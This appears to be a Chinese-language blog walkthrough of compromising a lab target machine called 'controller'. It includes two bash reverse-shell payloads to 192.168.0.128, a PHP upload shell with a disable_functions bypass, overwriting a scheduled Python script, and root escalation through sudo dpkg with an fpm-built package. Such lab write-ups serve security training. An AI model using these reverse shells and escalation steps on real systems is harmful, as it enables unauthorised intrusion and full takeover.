靶机渗透日记 controller

  1. IP

  2. 端口

    在这里插入图片描述

  3. 目录扫描

    在这里插入图片描述

    发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来

  4. 访问80端口

    在这里插入图片描述

    文档说明我们可以上传一个项目,并可以被运行

  5. 服务器还开放了 139,445 端口,访问 SMB 服务

    在这里插入图片描述

    可以匿名访问

  6. 上传 shell.txt

    import commands
    commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.0.128/4444 0>&1"')
    
  7. 监听本地4444端口成功反弹shell

    在这里插入图片描述

  8. 发现用户 webserv 在本地8080端口运行了一个网站

    在这里插入图片描述

  9. 使用 frp 将目标端口 8080 代理到本地的 6000 端口

  10. 目录扫描

    在这里插入图片描述

    发现存在 upload.php

  11. 发现可以直接上传 .php 文件,成功getshell后发现无法执行命令

    在这里插入图片描述

    使用 PHP7_UserFilter 进行绕过

    在这里插入图片描述

  12. 检查用户拥有的文件

    find / -user webservice 2>/dev/null
    

    在这里插入图片描述

    查看 website.py 文件

    import socket
    import sys
    import os
    
    scan = '127.0.0.1'
    port = 80
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(1)
    check = s.connect_ex((scan,port))
    if check == 0:
    	os.system("echo 'website up'>> /opt/logs/log.txt")
    else:
    	os.system("echo 'website down'>> /opt/logs/log.txt")
    s.close
    sys.exit(0)
    

    替换payload

    import socket
    import sys
    import os
    
    os.system('/bin/bash -c "bash -i >& /dev/tcp/192.168.0.128/5555 0>&1"')
    

    监听5555端口反弹shell

    在这里插入图片描述

  13. 执行sudo -l

    在这里插入图片描述

    利用 dpkg 提权

    TF=$(mktemp -d)
    echo 'exec /bin/sh' > $TF/x.sh
    fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
    
    sudo dpkg -i x_1.0_all.deb
    

    在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值